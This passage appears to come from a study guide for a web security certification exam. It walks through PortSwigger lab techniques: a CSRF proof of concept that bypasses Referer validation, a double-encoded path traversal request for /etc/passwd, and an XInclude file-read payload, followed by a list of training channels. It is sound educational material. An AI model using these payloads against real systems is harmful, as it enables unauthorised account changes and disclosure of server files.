1273 | [PortSwigger Lab: Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking)  
1274 |   
1275 |   
1276 | ### Referer CSRF  
1277 | 
1278 | >Identify change email vulnerable to the referer header to validate being part of the referer header value.  
1279 | 
1280 | >Adding original domain of target and append it to the **Referer header** in the form of a query string, allow the change email to update.  
1281 | 
1282 | ```html
1283 | HTTP/1.1 200 OK
1284 | Content-Type: text/html; charset=utf-8
1285 | Referrer-Policy: unsafe-url
1286 | ```  
1287 | 
1288 | >**Note:** Unlike the normal Referer header spelling, the word **"referrer"** must be spelled correctly in the above code^^.  
1289 | 
1290 | >Create a CSRF proof of concept exploit and host it on the exploit server. Edit the JavaScript so that the third argument of the **history.pushState()** function includes a query string with target URL.  
1291 | 
1292 | ```html
1293 | <html>
1294 |   <!-- CSRF PoC - generated by Burp Suite Professional --> 
1295 |   <body>
1296 |   <script>history.pushState("", "", "/?TARGET.web-security-academy.net")</script>
1297 |     <form action="https://TARGET.web-security-academy.net/my-account/change-email" method="POST">
1298 |       <input type="hidden" name="email" value="test&#64;test&#46;com" />
1299 |       <input type="submit" value="Submit request" />
1300 |     </form>
1301 |     <script>
1302 |       document.forms[0].submit();
1303 |     </script>
1304 |   </body>
1305 | </html>
1306 | ```  
1307 | 
1308 | >When above exploit payload body CSRF delivered to victim, it changes victim email to test@test.com.  
1309 | 
1310 | ![referer csrf](images/referer-csrf.png)  
1311 | 
1312 | [PortSwigger Lab: CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses/lab-referer-validation-broken)  
1313 | 
1314 |   
1315 | ## File Path Traversal
1316 | 
1317 | >The imagefile parameter is vulnerable to directory traversal path attacks, enabling read access to arbitrary files on the server.
1318 | 
1319 | ```bash
1320 | ../../../../../../../../../../
1321 | ```  
1322 | 
1323 | >On the admin portal the images are loaded using **imagefile=** parameter, vulnerable to directory traversal.  
1324 | 
1325 | ```html
1326 | GET /admin_controls/metrics/admin-image?imagefile=%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
1327 | ```  
1328 | 
1329 | ![URL encode path traverse](images/encode-path-traverse.png)  
1330 | 
1331 | >Burp Intruder provides a predefined payload list (Fuzzing - path traversal).  
1332 | 
1333 | [PortSwigger Lab: File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)  
1334 |   
1335 | [PortSwigger Academy File-path-traversal](https://portswigger.net/web-security/file-path-traversal)  
1336 | 
1337 | 
1338 | ## Focus Scanning  
1339 | 
1340 | >Due to the tight time limit during engagements, scan defined insertion points for specific requests.  
1341 | 
1342 | ![scan-defined-insertion-points](images/scan-defined-insertion-points.png)  
1343 | 
1344 | >Scanner detected xmlns on stockId parameter and can lead to reading file on host parse text.  
1345 | 
1346 | ```xml
1347 | <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///home/carlos/secret"/></foo>
1348 | ```  
1349 | 
1350 | [PortSwigger Lab: Discovering vulnerabilities quickly with targeted scanning](https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-discovering-vulnerabilities-quickly-with-targeted-scanning)  
1351 |   
1352 | 
1353 | 
1354 | ## YouTube Training Playlist 
1355 |   
1356 | [YouTube Study Playlist](https://youtube.com/playlist?list=PLsDxQTEdg_YkVMP6PybE7I-hAdhR7adem)  
1357 | 
1358 | Youtube channels:  
1359 | 
1360 | 1. [Rana Khalil](https://www.youtube.com/@RanaKhalil101/videos)  
1361 | 2. [David Bombal](https://www.youtube.com/@davidbombal/videos)  
1362 | 3. [intigriti](https://www.youtube.com/@intigriti/videos)  
1363 | 4. [Seven Seas Security](https://www.youtube.com/@7SeasSecurity/videos)  
1364 | 5. [LiveUnderflow](https://www.youtube.com/@LiveUnderflow/videos)  
1365 | 6. [Tib3rius](https://www.youtube.com/@Tib3rius/videos)  
1366 | 7. [John Hammond](https://www.youtube.com/@_JohnHammond/videos)  
1367 | 8. [TraceTheCode](https://www.youtube.com/@TraceTheCode/videos)  
1368 | 9. [Sabyasachi Paul](https://www.youtube.com/@h0tPlug1n/videos)  
1369 | 10. [bmdyy](https://www.youtube.com/@bmdyy/videos)  
1370 | 11. [securityguideme](https://www.youtube.com/@securityguideme/videos)  
1371 | 12. [nu11 security](https://www.youtube.com/@Nul1Secur1ty/videos)  
1372 | 13. [PortSwigger](https://www.youtube.com/@PortSwiggerTV/videos)  
1373 | 14. [IppSec](https://www.youtube.com/@ippsec/videos)  
1374 | 15. [@tjc_](https://www.youtube.com/@tjc_/videos)  
1375 |   
1376 | 
1377 | ## Footnote
1378 | 
1379 | >The exam is designed to be challenging, it is not straight forward vulnerabilities, twisted challenges and even rabbit holes. Perseverance: persistence in doing something despite difficulty or delay in achieving success.  #TryHarder  
1380 |   


--------------------------------------------------------------------------------